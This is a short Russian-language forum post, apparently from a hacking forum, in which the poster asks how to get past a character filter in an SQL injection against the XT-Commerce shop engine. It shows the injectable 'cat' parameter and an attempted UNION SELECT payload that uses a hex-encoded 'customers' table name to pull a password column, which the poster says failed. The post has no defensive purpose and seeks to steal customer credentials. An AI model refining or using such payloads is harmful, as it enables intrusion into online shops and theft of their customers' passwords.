Всем привет!
В движке XT-Commerce есть уязвимость - SQL-injection:
Цитата:
Сообщение от None
http://site.com/index.php?cat=
SQL-inj
|
Но, т.к. генерируемые самим движком ссылки имеют примерно такой вид:
Цитата:
Сообщение от None
http://site.com/index.php?cat=
с
197
|
Цитата:
Сообщение от None
http://site.com/index.php?cPath=197
_
6694
|
т.е. содержат символы с и _, то скрипт их вырезает. Поэтому нельзя, например сделать выборку из таблицы, в имени которой есть буква с или _.
Пробовал обойти это, заюзав переменные, вроде:
Цитата:
Сообщение от None
http://site.com/index.php?cat=-1+union+select+(@a:=0x637573746F6D657273),2,3,pass word+from+@a%23
|
0x637573746F6D657273=(customers)
Но этот номер не прокатывает.
Кто-нибудь знает, как можно обойти?
|